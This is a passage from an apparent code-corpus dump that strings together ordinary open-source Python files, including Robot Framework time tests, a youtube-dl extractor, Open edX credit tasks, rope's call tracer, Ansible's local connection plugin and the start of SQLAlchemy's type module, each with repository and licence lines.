starttime = '20060526 14:01:10.500'
for endtime, expected in [('20060526 14:01:10.499', -1),
('20060526 14:01:10.000', -500),
('20060526 14:01:09.900', -600),
('20060526 14:01:09.501', -999),
('20060526 14:01:09.500', -1000),
('20060526 14:01:09.499', -1001)]:
actual = get_elapsed_time(starttime, endtime)
assert_equal(actual, expected, endtime)
def test_elapsed_time_to_string(self):
for elapsed, expected in [(0, '00:00:00.000'),
(0.1, '00:00:00.000'),
(0.49999, '00:00:00.000'),
(0.5, '00:00:00.001'),
(1, '00:00:00.001'),
(42, '00:00:00.042'),
(999, '00:00:00.999'),
(999.9, '00:00:01.000'),
(1000, '00:00:01.000'),
(1001, '00:00:01.001'),
(60000, '00:01:00.000'),
(600000, '00:10:00.000'),
(654321, '00:10:54.321'),
(660000, '00:11:00.000'),
(3600000, '01:00:00.000'),
(36000000, '10:00:00.000'),
(360000000, '100:00:00.000'),
(360000000 + 36000000 + 3600000 +
660000 + 11111, '111:11:11.111')]:
assert_equal(elapsed_time_to_string(elapsed), expected, elapsed)
if expected != '00:00:00.000':
assert_equal(elapsed_time_to_string(-1 * elapsed),
'-' + expected, elapsed)
def test_elapsed_time_to_string_without_millis(self):
for elapsed, expected in [(0, '00:00:00'),
(1, '00:00:00'),
(499, '00:00:00'),
(499.999, '00:00:00'),
(500, '00:00:01'),
(999, '00:00:01'),
(1000, '00:00:01'),
(1499, '00:00:01'),
(59499.9, '00:00:59'),
(59500.0, '00:01:00'),
(59999, '00:01:00'),
(60000, '00:01:00'),
(654321, '00:10:54'),
(654500, '00:10:55'),
(3599999, '01:00:00'),
(3600000, '01:00:00'),
(359999999, '100:00:00'),
(360000000, '100:00:00'),
(360000500, '100:00:01')]:
assert_equal(elapsed_time_to_string(elapsed, include_millis=False),
expected, elapsed)
if expected != '00:00:00':
assert_equal(elapsed_time_to_string(-1 * elapsed, False),
'-' + expected, elapsed)
def test_parse_time_with_valid_times(self):
for input, expected in [('100', 100),
('2007-09-20 16:15:14', EXAMPLE_TIME),
('20070920 161514', EXAMPLE_TIME)]:
assert_equal(parse_time(input), expected)
def test_parse_time_with_now_and_utc(self):
for input, adjusted in [('now', 0),
('NOW', 0),
('Now', 0),
('now+100seconds', 100),
('now - 100 seconds ', -100),
('now + 1 day 100 seconds', 86500),
('now - 1 day 100 seconds', -86500),
('now + 1day 10hours 1minute 10secs', 122470),
('NOW - 1D 10H 1MIN 10S', -122470)]:
expected = get_time('epoch') + adjusted
parsed = parse_time(input)
            assert_true(expected <= parsed <= expected + 1)
parsed = parse_time(input.upper().replace('NOW', 'UtC'))
zone = time.altzone if time.localtime().tm_isdst else time.timezone
expected += zone
            assert_true(expected <= parsed <= expected + 1)
def test_parse_modified_time_with_invalid_times(self):
for value, msg in [("-100", "Epoch time must be positive (got -100)"),
("YYYY-MM-DD hh:mm:ss",
"Invalid time format 'YYYY-MM-DD hh:mm:ss'"),
("now + foo", "Invalid time string 'foo'."),
("now - 2a ", "Invalid time string '2a'."),
("now+", "Invalid time string ''."),
("nowadays", "Invalid time format 'nowadays'")]:
assert_raises_with_msg(ValueError, msg, parse_time, value)
def test_parse_time_and_get_time_must_round_seconds_down(self):
# Rounding to closest second, instead of rounding down, could give
# times that are greater then e.g. timestamps of files created
# afterwards.
self._verify_parse_time_and_get_time_rounding()
time.sleep(0.5)
self._verify_parse_time_and_get_time_rounding()
def _verify_parse_time_and_get_time_rounding(self):
secs = lambda: int(time.time()) % 60
start_secs = secs()
gt_result = get_time()[-2:]
pt_result = parse_time('NOW') % 60
# Check that seconds have not changed during test
if secs() == start_secs:
assert_equal(gt_result, '%02d' % start_secs)
assert_equal(pt_result, start_secs)
def test_get_timestamp_without_millis(self):
# Need to test twice to verify also possible cached timestamp
assert_true(re.match('\d{8} \d\d:\d\d:\d\d', get_timestamp(millissep=None)))
assert_true(re.match('\d{8} \d\d:\d\d:\d\d', get_timestamp(millissep=None)))
if __name__ == "__main__":
unittest.main()
| apache-2.0 |
shanglt/youtube-dl | youtube_dl/extractor/laola1tv.py | 122 | 3030 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import random
import re
from .common import InfoExtractor
from ..utils import (
ExtractorError,
xpath_text,
)
class Laola1TvIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?laola1\.tv/(?P<lang>[a-z]+)-(?P<portal>[a-z]+)/.*?/(?P<id>[0-9]+)\.html'
_TEST = {
'url': 'http://www.laola1.tv/de-de/video/straubing-tigers-koelner-haie/227883.html',
'info_dict': {
'id': '227883',
'ext': 'mp4',
'title': 'Straubing Tigers - Kölner Haie',
'categories': ['Eishockey'],
'is_live': False,
},
'params': {
'skip_download': True,
}
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id = mobj.group('id')
lang = mobj.group('lang')
portal = mobj.group('portal')
webpage = self._download_webpage(url, video_id)
iframe_url = self._search_regex(
r'<iframe[^>]*?class="main_tv_player"[^>]*?src="([^"]+)"',
webpage, 'iframe URL')
iframe = self._download_webpage(
iframe_url, video_id, note='Downloading iframe')
flashvars_m = re.findall(
r'flashvars\.([_a-zA-Z0-9]+)\s*=\s*"([^"]*)";', iframe)
flashvars = dict((m[0], m[1]) for m in flashvars_m)
partner_id = self._search_regex(
r'partnerid\s*:\s*"([^"]+)"', iframe, 'partner id')
xml_url = ('http://www.laola1.tv/server/hd_video.php?' +
'play=%s&partner=%s&portal=%s&v5ident=&lang=%s' % (
video_id, partner_id, portal, lang))
hd_doc = self._download_xml(xml_url, video_id)
title = xpath_text(hd_doc, './/video/title', fatal=True)
flash_url = xpath_text(hd_doc, './/video/url', fatal=True)
uploader = xpath_text(hd_doc, './/video/meta_organistation')
is_live = xpath_text(hd_doc, './/video/islive') == 'true'
categories = xpath_text(hd_doc, './/video/meta_sports')
if categories:
categories = categories.split(',')
ident = random.randint(10000000, 99999999)
        token_url = '%s&ident=%s&klub=0&unikey=0&timestamp=%s&auth=%s' % (
flash_url, ident, flashvars['timestamp'], flashvars['auth'])
token_doc = self._download_xml(
token_url, video_id, note='Downloading token')
token_attrib = token_doc.find('.//token').attrib
if token_attrib.get('auth') in ('blocked', 'restricted'):
raise ExtractorError(
'Token error: %s' % token_attrib.get('comment'), expected=True)
video_url = '%s?hdnea=%s&hdcore=3.2.0' % (
token_attrib['url'], token_attrib['auth'])
return {
'id': video_id,
'is_live': is_live,
'title': title,
'url': video_url,
'uploader': uploader,
'categories': categories,
'ext': 'mp4',
}
| unlicense |
shurihell/testasia | openedx/core/djangoapps/credit/tasks.py | 60 | 7836 | """
This file contains celery tasks for credit course views.
"""
from celery import task
from celery.utils.log import get_task_logger
from django.conf import settings
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey, UsageKey
from openedx.core.djangoapps.credit.api import set_credit_requirements
from openedx.core.djangoapps.credit.exceptions import InvalidCreditRequirements
from openedx.core.djangoapps.credit.models import CreditCourse
from openedx.core.djangoapps.credit.utils import get_course_blocks
from xmodule.modulestore.django import modulestore
from xmodule.modulestore.exceptions import ItemNotFoundError
LOGGER = get_task_logger(__name__)
# XBlocks that can be added as credit requirements
CREDIT_REQUIREMENT_XBLOCK_CATEGORIES = [
"edx-reverification-block",
]
# pylint: disable=not-callable
@task(default_retry_delay=settings.CREDIT_TASK_DEFAULT_RETRY_DELAY, max_retries=settings.CREDIT_TASK_MAX_RETRIES)
def update_credit_course_requirements(course_id): # pylint: disable=invalid-name
"""
Updates course requirements table for a course.
Args:
course_id(str): A string representation of course identifier
Returns:
None
"""
try:
course_key = CourseKey.from_string(course_id)
is_credit_course = CreditCourse.is_credit_course(course_key)
if is_credit_course:
requirements = _get_course_credit_requirements(course_key)
set_credit_requirements(course_key, requirements)
except (InvalidKeyError, ItemNotFoundError, InvalidCreditRequirements) as exc:
LOGGER.error('Error on adding the requirements for course %s - %s', course_id, unicode(exc))
raise update_credit_course_requirements.retry(args=[course_id], exc=exc)
else:
LOGGER.info('Requirements added for course %s', course_id)
def _get_course_credit_requirements(course_key):
"""
Returns the list of credit requirements for the given course.
This will also call into the edx-proctoring subsystem to also
produce proctored exam requirements for credit bearing courses
It returns the minimum_grade_credit and also the ICRV checkpoints
if any were added in the course
Args:
course_key (CourseKey): Identifier for the course.
Returns:
List of credit requirements (dictionaries)
"""
credit_xblock_requirements = _get_credit_course_requirement_xblocks(course_key)
min_grade_requirement = _get_min_grade_requirement(course_key)
proctored_exams_requirements = _get_proctoring_requirements(course_key)
block_requirements = credit_xblock_requirements + proctored_exams_requirements
# sort credit requirements list based on start date and put all the
# requirements with no start date at the end of requirement list.
sorted_block_requirements = sorted(
block_requirements, key=lambda x: (x['start_date'] is None, x['start_date'], x['display_name'])
)
credit_requirements = (
min_grade_requirement + sorted_block_requirements
)
return credit_requirements
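# Illustrative shape of the list returned by _get_course_credit_requirements
# (values are hypothetical; the minimum-grade entry comes first, followed by
# the block/exam requirements sorted by start date):
#   [{'namespace': 'grade', 'name': 'grade', 'display_name': 'Minimum Grade',
#     'criteria': {'min_grade': 0.8}},
#    {'namespace': 'proctored_exam', 'name': '<exam content_id>',
#     'display_name': 'Midterm Exam', 'start_date': None, 'criteria': {}}]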
def _get_min_grade_requirement(course_key):
"""
Get list of 'minimum_grade_credit' requirement for the given course.
Args:
course_key (CourseKey): Identifier for the course.
Returns:
The list of minimum_grade_credit requirements
"""
course = modulestore().get_course(course_key, depth=0)
try:
return [
{
"namespace": "grade",
"name": "grade",
"display_name": "Minimum Grade",
"criteria": {
"min_grade": course.minimum_grade_credit
},
}
]
    except AttributeError:
        LOGGER.error("The course %s does not have a minimum_grade_credit attribute", unicode(course.id))
        return []
def _get_credit_course_requirement_xblocks(course_key): # pylint: disable=invalid-name
"""Generate a course structure dictionary for the specified course.
Args:
course_key (CourseKey): Identifier for the course.
Returns:
The list of credit requirements xblocks dicts
"""
requirements = []
# Retrieve all XBlocks from the course that we know to be credit requirements.
# For performance reasons, we look these up by their "category" to avoid
# loading and searching the entire course tree.
for category in CREDIT_REQUIREMENT_XBLOCK_CATEGORIES:
requirements.extend([
{
"namespace": block.get_credit_requirement_namespace(),
"name": block.get_credit_requirement_name(),
"display_name": block.get_credit_requirement_display_name(),
'start_date': block.start,
"criteria": {},
}
for block in _get_xblocks(course_key, category)
if _is_credit_requirement(block)
])
return requirements
def _get_xblocks(course_key, category):
"""
Retrieve all XBlocks in the course for a particular category.
Returns only XBlocks that are published and haven't been deleted.
"""
xblocks = get_course_blocks(course_key, category)
return xblocks
def _is_credit_requirement(xblock):
"""
Check if the given XBlock is a credit requirement.
Args:
xblock(XBlock): The given XBlock object
Returns:
True if XBlock is a credit requirement else False
"""
required_methods = [
"get_credit_requirement_namespace",
"get_credit_requirement_name",
"get_credit_requirement_display_name"
]
for method_name in required_methods:
if not callable(getattr(xblock, method_name, None)):
LOGGER.error(
"XBlock %s is marked as a credit requirement but does not "
"implement %s", unicode(xblock), method_name
)
return False
return True
def _get_proctoring_requirements(course_key):
"""
Will return list of requirements regarding any exams that have been
marked as proctored exams. For credit-bearing courses, all
proctored exams must be validated and confirmed from a proctoring
standpoint. The passing grade on an exam is not enough.
Args:
course_key: The key of the course in question
Returns:
list of requirements dictionary, one per active proctored exam
"""
# Note: Need to import here as there appears to be
# a circular reference happening when launching Studio
# process
from edx_proctoring.api import get_all_exams_for_course
requirements = []
for exam in get_all_exams_for_course(unicode(course_key)):
if exam['is_proctored'] and exam['is_active'] and not exam['is_practice_exam']:
try:
usage_key = UsageKey.from_string(exam['content_id'])
proctor_block = modulestore().get_item(usage_key)
except (InvalidKeyError, ItemNotFoundError):
LOGGER.info("Invalid content_id '%s' for proctored block '%s'", exam['content_id'], exam['exam_name'])
proctor_block = None
if proctor_block:
requirements.append(
{
'namespace': 'proctored_exam',
'name': exam['content_id'],
'display_name': exam['exam_name'],
'start_date': proctor_block.start if proctor_block.start else None,
'criteria': {},
})
if requirements:
log_msg = (
'Registering the following as \'proctored_exam\' credit requirements: {log_msg}'.format(
log_msg=requirements
)
)
LOGGER.info(log_msg)
return requirements
| agpl-3.0 |
justyns/emacs-for-python | python-libs/rope/base/oi/runmod.py | 32 | 7600 |
def __rope_start_everything():
import os
import sys
import socket
import cPickle as pickle
import marshal
import inspect
import types
import threading
class _MessageSender(object):
def send_data(self, data):
pass
class _SocketSender(_MessageSender):
def __init__(self, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', port))
self.my_file = s.makefile('w')
def send_data(self, data):
if not self.my_file.closed:
pickle.dump(data, self.my_file)
def close(self):
self.my_file.close()
class _FileSender(_MessageSender):
def __init__(self, file_name):
self.my_file = open(file_name, 'wb')
def send_data(self, data):
if not self.my_file.closed:
marshal.dump(data, self.my_file)
def close(self):
self.my_file.close()
def _cached(func):
cache = {}
def newfunc(self, arg):
if arg in cache:
return cache[arg]
result = func(self, arg)
cache[arg] = result
return result
return newfunc
class _FunctionCallDataSender(object):
def __init__(self, send_info, project_root):
self.project_root = project_root
if send_info.isdigit():
self.sender = _SocketSender(int(send_info))
else:
self.sender = _FileSender(send_info)
def global_trace(frame, event, arg):
# HACK: Ignoring out->in calls
# This might lose some information
if self._is_an_interesting_call(frame):
return self.on_function_call
sys.settrace(global_trace)
threading.settrace(global_trace)
def on_function_call(self, frame, event, arg):
if event != 'return':
return
args = []
returned = ('unknown',)
code = frame.f_code
for argname in code.co_varnames[:code.co_argcount]:
try:
args.append(self._object_to_persisted_form(frame.f_locals[argname]))
except (TypeError, AttributeError):
args.append(('unknown',))
try:
returned = self._object_to_persisted_form(arg)
except (TypeError, AttributeError):
pass
try:
data = (self._object_to_persisted_form(frame.f_code),
tuple(args), returned)
self.sender.send_data(data)
except (TypeError):
pass
return self.on_function_call
def _is_an_interesting_call(self, frame):
#if frame.f_code.co_name in ['?', '<module>']:
# return False
#return not frame.f_back or not self._is_code_inside_project(frame.f_back.f_code)
if not self._is_code_inside_project(frame.f_code) and \
(not frame.f_back or not self._is_code_inside_project(frame.f_back.f_code)):
return False
return True
def _is_code_inside_project(self, code):
source = self._path(code.co_filename)
return source is not None and os.path.exists(source) and \
_realpath(source).startswith(self.project_root)
@_cached
def _get_persisted_code(self, object_):
source = self._path(object_.co_filename)
if not os.path.exists(source):
raise TypeError('no source')
return ('defined', _realpath(source), str(object_.co_firstlineno))
@_cached
def _get_persisted_class(self, object_):
try:
return ('defined', _realpath(inspect.getsourcefile(object_)),
object_.__name__)
except (TypeError, AttributeError):
return ('unknown',)
def _get_persisted_builtin(self, object_):
if isinstance(object_, (str, unicode)):
return ('builtin', 'str')
if isinstance(object_, list):
holding = None
if len(object_) > 0:
holding = object_[0]
return ('builtin', 'list', self._object_to_persisted_form(holding))
if isinstance(object_, dict):
keys = None
values = None
if len(object_) > 0:
keys = object_.keys()[0]
values = object_[keys]
return ('builtin', 'dict',
self._object_to_persisted_form(keys),
self._object_to_persisted_form(values))
if isinstance(object_, tuple):
objects = []
if len(object_) < 3:
for holding in object_:
objects.append(self._object_to_persisted_form(holding))
else:
objects.append(self._object_to_persisted_form(object_[0]))
return tuple(['builtin', 'tuple'] + objects)
if isinstance(object_, set):
holding = None
if len(object_) > 0:
for o in object_:
holding = o
break
return ('builtin', 'set', self._object_to_persisted_form(holding))
return ('unknown',)
def _object_to_persisted_form(self, object_):
if object_ is None:
return ('none',)
if isinstance(object_, types.CodeType):
return self._get_persisted_code(object_)
if isinstance(object_, types.FunctionType):
return self._get_persisted_code(object_.func_code)
if isinstance(object_, types.MethodType):
return self._get_persisted_code(object_.im_func.func_code)
if isinstance(object_, types.ModuleType):
return self._get_persisted_module(object_)
if isinstance(object_, (str, unicode, list, dict, tuple, set)):
return self._get_persisted_builtin(object_)
if isinstance(object_, (types.TypeType, types.ClassType)):
return self._get_persisted_class(object_)
return ('instance', self._get_persisted_class(type(object_)))
@_cached
def _get_persisted_module(self, object_):
path = self._path(object_.__file__)
if path and os.path.exists(path):
return ('defined', _realpath(path))
return ('unknown',)
def _path(self, path):
if path.endswith('.pyc'):
path = path[:-1]
if path.endswith('.py'):
return path
def close(self):
self.sender.close()
def _realpath(path):
return os.path.realpath(os.path.abspath(os.path.expanduser(path)))
send_info = sys.argv[1]
project_root = sys.argv[2]
file_to_run = sys.argv[3]
run_globals = globals()
run_globals.update({'__name__': '__main__',
'__builtins__': __builtins__,
'__file__': file_to_run})
if send_info != '-':
data_sender = _FunctionCallDataSender(send_info, project_root)
del sys.argv[1:4]
execfile(file_to_run, run_globals)
if send_info != '-':
data_sender.close()
if __name__ == '__main__':
__rope_start_everything()
| gpl-3.0 |
tsdmgz/ansible | lib/ansible/plugins/connection/local.py | 73 | 6815 | # (c) 2012, Michael DeHaan <[email protected]>
# (c) 2015, 2017 Toshio Kuratomi <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = '''
connection: local
short_description: execute on controller
description:
- This connection plugin allows ansible to execute tasks on the Ansible 'controller' instead of on a remote host.
author: ansible (@core)
version_added: historical
notes:
- The remote user is ignored, the user with which the ansible CLI was executed is used instead.
'''
import os
import shutil
import subprocess
import fcntl
import getpass
import ansible.constants as C
from ansible.compat import selectors
from ansible.errors import AnsibleError, AnsibleFileNotFound
from ansible.module_utils.six import text_type, binary_type
from ansible.module_utils._text import to_bytes, to_native, to_text
from ansible.plugins.connection import ConnectionBase
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
class Connection(ConnectionBase):
''' Local based connections '''
transport = 'local'
has_pipelining = True
def _connect(self):
''' connect to the local host; nothing to do here '''
# Because we haven't made any remote connection we're running as
# the local user, rather than as whatever is configured in
# remote_user.
self._play_context.remote_user = getpass.getuser()
if not self._connected:
display.vvv(u"ESTABLISH LOCAL CONNECTION FOR USER: {0}".format(self._play_context.remote_user), host=self._play_context.remote_addr)
self._connected = True
return self
def exec_command(self, cmd, in_data=None, sudoable=True):
''' run a command on the local host '''
super(Connection, self).exec_command(cmd, in_data=in_data, sudoable=sudoable)
display.debug("in local.exec_command()")
executable = C.DEFAULT_EXECUTABLE.split()[0] if C.DEFAULT_EXECUTABLE else None
display.vvv(u"EXEC {0}".format(to_text(cmd)), host=self._play_context.remote_addr)
display.debug("opening command with Popen()")
if isinstance(cmd, (text_type, binary_type)):
cmd = to_bytes(cmd)
else:
cmd = map(to_bytes, cmd)
p = subprocess.Popen(
cmd,
shell=isinstance(cmd, (text_type, binary_type)),
executable=executable, # cwd=...
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
display.debug("done running command with Popen()")
if self._play_context.prompt and sudoable:
fcntl.fcntl(p.stdout, fcntl.F_SETFL, fcntl.fcntl(p.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
fcntl.fcntl(p.stderr, fcntl.F_SETFL, fcntl.fcntl(p.stderr, fcntl.F_GETFL) | os.O_NONBLOCK)
selector = selectors.DefaultSelector()
selector.register(p.stdout, selectors.EVENT_READ)
selector.register(p.stderr, selectors.EVENT_READ)
become_output = b''
try:
while not self.check_become_success(become_output) and not self.check_password_prompt(become_output):
events = selector.select(self._play_context.timeout)
if not events:
stdout, stderr = p.communicate()
raise AnsibleError('timeout waiting for privilege escalation password prompt:\n' + to_native(become_output))
for key, event in events:
if key.fileobj == p.stdout:
chunk = p.stdout.read()
elif key.fileobj == p.stderr:
chunk = p.stderr.read()
if not chunk:
stdout, stderr = p.communicate()
raise AnsibleError('privilege output closed while waiting for password prompt:\n' + to_native(become_output))
become_output += chunk
finally:
selector.close()
if not self.check_become_success(become_output):
p.stdin.write(to_bytes(self._play_context.become_pass, errors='surrogate_or_strict') + b'\n')
fcntl.fcntl(p.stdout, fcntl.F_SETFL, fcntl.fcntl(p.stdout, fcntl.F_GETFL) & ~os.O_NONBLOCK)
fcntl.fcntl(p.stderr, fcntl.F_SETFL, fcntl.fcntl(p.stderr, fcntl.F_GETFL) & ~os.O_NONBLOCK)
display.debug("getting output with communicate()")
stdout, stderr = p.communicate(in_data)
display.debug("done communicating")
display.debug("done with local.exec_command()")
return (p.returncode, stdout, stderr)
def put_file(self, in_path, out_path):
''' transfer a file from local to local '''
super(Connection, self).put_file(in_path, out_path)
display.vvv(u"PUT {0} TO {1}".format(in_path, out_path), host=self._play_context.remote_addr)
if not os.path.exists(to_bytes(in_path, errors='surrogate_or_strict')):
raise AnsibleFileNotFound("file or module does not exist: {0}".format(to_native(in_path)))
try:
shutil.copyfile(to_bytes(in_path, errors='surrogate_or_strict'), to_bytes(out_path, errors='surrogate_or_strict'))
except shutil.Error:
raise AnsibleError("failed to copy: {0} and {1} are the same".format(to_native(in_path), to_native(out_path)))
except IOError as e:
raise AnsibleError("failed to transfer file to {0}: {1}".format(to_native(out_path), to_native(e)))
def fetch_file(self, in_path, out_path):
        ''' fetch a file from local to local -- for compatibility '''
super(Connection, self).fetch_file(in_path, out_path)
display.vvv(u"FETCH {0} TO {1}".format(in_path, out_path), host=self._play_context.remote_addr)
self.put_file(in_path, out_path)
def close(self):
''' terminate the connection; nothing to do here '''
self._connected = False
| gpl-3.0 |
ibab/tensorflow | tensorflow/contrib/__init__.py | 5 | 1621 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""contrib module containing volatile or experimental code."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Add projects here, they will show up under tf.contrib.
from tensorflow.contrib import ctc
from tensorflow.contrib import distributions
from tensorflow.contrib import framework
from tensorflow.contrib import grid_rnn
from tensorflow.contrib import layers
from tensorflow.contrib import learn
from tensorflow.contrib import linear_optimizer
from tensorflow.contrib import lookup
from tensorflow.contrib import losses
from tensorflow.contrib import metrics
from tensorflow.contrib import opt
from tensorflow.contrib import quantization
from tensorflow.contrib import rnn
from tensorflow.contrib import skflow
from tensorflow.contrib import tensor_forest
from tensorflow.contrib import testing
from tensorflow.contrib import util
from tensorflow.contrib import copy_graph
| apache-2.0 |
qifeigit/scikit-learn | examples/decomposition/plot_pca_3d.py | 354 | 2432 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
=========================================================
Principal components analysis (PCA)
=========================================================
These figures aid in illustrating how a point cloud
can be very flat in one direction--which is where PCA
comes in to choose a direction that is not flat.
"""
print(__doc__)
# Authors: Gael Varoquaux
# Jaques Grobler
# Kevin Hughes
# License: BSD 3 clause
from sklearn.decomposition import PCA
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
import matplotlib.pyplot as plt
from scipy import stats
###############################################################################
# Create the data
e = np.exp(1)
np.random.seed(4)
def pdf(x):
return 0.5 * (stats.norm(scale=0.25 / e).pdf(x)
+ stats.norm(scale=4 / e).pdf(x))
y = np.random.normal(scale=0.5, size=(30000))
x = np.random.normal(scale=0.5, size=(30000))
z = np.random.normal(scale=0.1, size=len(x))
density = pdf(x) * pdf(y)
pdf_z = pdf(5 * z)
density *= pdf_z
a = x + y
b = 2 * y
c = a - b + z
norm = np.sqrt(a.var() + b.var())
a /= norm
b /= norm
###############################################################################
# Plot the figures
def plot_figs(fig_num, elev, azim):
fig = plt.figure(fig_num, figsize=(4, 3))
plt.clf()
ax = Axes3D(fig, rect=[0, 0, .95, 1], elev=elev, azim=azim)
ax.scatter(a[::10], b[::10], c[::10], c=density[::10], marker='+', alpha=.4)
Y = np.c_[a, b, c]
# Using SciPy's SVD, this would be:
# _, pca_score, V = scipy.linalg.svd(Y, full_matrices=False)
pca = PCA(n_components=3)
pca.fit(Y)
pca_score = pca.explained_variance_ratio_
V = pca.components_
x_pca_axis, y_pca_axis, z_pca_axis = V.T * pca_score / pca_score.min()
x_pca_axis, y_pca_axis, z_pca_axis = 3 * V.T
x_pca_plane = np.r_[x_pca_axis[:2], - x_pca_axis[1::-1]]
y_pca_plane = np.r_[y_pca_axis[:2], - y_pca_axis[1::-1]]
z_pca_plane = np.r_[z_pca_axis[:2], - z_pca_axis[1::-1]]
x_pca_plane.shape = (2, 2)
y_pca_plane.shape = (2, 2)
z_pca_plane.shape = (2, 2)
ax.plot_surface(x_pca_plane, y_pca_plane, z_pca_plane)
ax.w_xaxis.set_ticklabels([])
ax.w_yaxis.set_ticklabels([])
ax.w_zaxis.set_ticklabels([])
elev = -40
azim = -80
plot_figs(1, elev, azim)
elev = 30
azim = 20
plot_figs(2, elev, azim)
plt.show()
| bsd-3-clause |
sammyt/p3 | tests/p3_select_all_vows.py | 1 | 3512 | from p3 import P3
from pyvows import Vows, expect
import lxml
from lxml.etree import ElementBase
from lxml.html import builder as E
from lxml.html import fromstring, tostring
from lxml.cssselect import CSSSelector
@Vows.batch
class SelectionSelectAll(Vows.Context):
class SelectBody(Vows.Context):
"""select(body)"""
def topic(self):
html = E.HTML(
E.HEAD(),
E.BODY(
E.DIV(E.CLASS('first')),
E.DIV(E.CLASS('second')))
)
return P3(html).select('body')
def select_all_matching(self, body):
div = body.select_all('div')
doc = div.root.document
expect(div[0][0]).to_equal(doc[1][0])
expect(div[0][1]).to_equal(doc[1][1])
        def propagates_parent_to_selected(self, body):
div = body.select_all('div')
doc = div.root.document
expect(div[0].parent_node).to_equal(doc[1])
        def does_not_propagate_data(self, body):
div = body.data(['a', 'b']).select_all('div')
ds = div.root.dataset
expect(ds.get(div[0][0], "nope")).to_equal('nope')
expect(ds.get(div[0][1], "nope")).to_equal('nope')
def returns_an_empty_array_if_no_match(self, body):
span = body.select_all('span')
expect(span).to_length(1)
expect(span[0]).to_length(0)
def can_select_by_function(self, body):
data = 'foo'
datas = []
indexes = []
nodes = []
doc = body.root.document
doc_body = doc[1]
def to_call(node, data, index):
datas.append(data)
indexes.append(index)
nodes.append(node)
return node.getchildren()
s = body.data([data]).select_all(to_call)
expect(datas).to_equal([data])
expect(indexes).to_equal([0])
expect(nodes).to_equal([doc_body])
expect(s[0][0]).to_equal(doc_body[0])
expect(s[0][1]).to_equal(doc_body[1])
class SelectAllDiv(Vows.Context):
"""select_all(div)"""
def topic(self):
html = E.HTML(
E.HEAD(),
E.BODY()
)
p3 = P3(html)
div = p3.select('body').select_all('div')\
.data(range(2)).enter().create("div")
div.create("span").attr("class", "first")
div.create("span").attr("class", "second")
return div
        def select_all_matching(self, div):
span = div.select_all('span')
expect(span).to_length(2)
expect(span[0]).to_length(2)
expect(span[0][0].getparent()).to_equal(div[0][0])
expect(span[0][1].getparent()).to_equal(div[0][0])
expect(span[1][0].getparent()).to_equal(div[0][1])
expect(span[1][1].getparent()).to_equal(div[0][1])
        def propagates_parent_to_selected(self, div):
body = div.root.document[1]
span = div.select_all('span')
expect(span[0].parent_node).to_equal(body[0])
expect(span[1].parent_node).to_equal(body[1])
def returns_an_empty_array_if_no_match(self, div):
sub = div.select_all('div')
expect(sub).to_length(2)
expect(sub[0]).to_length(0)
expect(sub[1]).to_length(0)
| mit |
alex/sqlalchemy | lib/sqlalchemy/sql/sqltypes.py | 2 | 51062 | # sql/sqltypes.py
# Copyright (C) 2005-2013 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""SQL specific types.
"""
import datetime as dt
import codecs
from .type_api import TypeEngine, TypeDecorator, to_instance
from .elements import quoted_name
from .default_comparator import _DefaultColumnComparator
from .. import exc, util, processors
from .base import _bind_or_error, SchemaEventTarget
from . import operators
from .. import event
from ..util import pickle
import decimal
if util.jython:
import array
class _DateAffinity(object):
"""Mixin date/time specific expression adaptations.
Rules are implemented within Date,Time,Interval,DateTime, Numeric,
Integer. Based on http://www.postgresql.org/docs/current/static
/functions-datetime.html.
"""
@property
def _expression_adaptations(self):
raise NotImplementedError()
class Comparator(TypeEngine.Comparator):
_blank_dict = util.immutabledict()
def _adapt_expression(self, op, other_comparator):
othertype = other_comparator.type._type_affinity
return op, \
to_instance(self.type._expression_adaptations.get(op, self._blank_dict).\
get(othertype, NULLTYPE))
comparator_factory = Comparator
class Concatenable(object):
"""A mixin that marks a type as supporting 'concatenation',
typically strings."""
class Comparator(TypeEngine.Comparator):
def _adapt_expression(self, op, other_comparator):
if op is operators.add and isinstance(other_comparator,
(Concatenable.Comparator, NullType.Comparator)):
return operators.concat_op, self.expr.type
else:
return op, self.expr.type
comparator_factory = Comparator
class String(Concatenable, TypeEngine):
"""The base for all string and character types.
In SQL, corresponds to VARCHAR. Can also take Python unicode objects
and encode to the database's encoding in bind params (and the reverse for
result sets.)
The `length` field is usually required when the `String` type is
used within a CREATE TABLE statement, as VARCHAR requires a length
on most databases.
"""
__visit_name__ = 'string'
def __init__(self, length=None, collation=None,
convert_unicode=False,
unicode_error=None,
_warn_on_bytestring=False
):
"""
Create a string-holding type.
:param length: optional, a length for the column for use in
DDL and CAST expressions. May be safely omitted if no ``CREATE
TABLE`` will be issued. Certain databases may require a
``length`` for use in DDL, and will raise an exception when
the ``CREATE TABLE`` DDL is issued if a ``VARCHAR``
with no length is included. Whether the value is
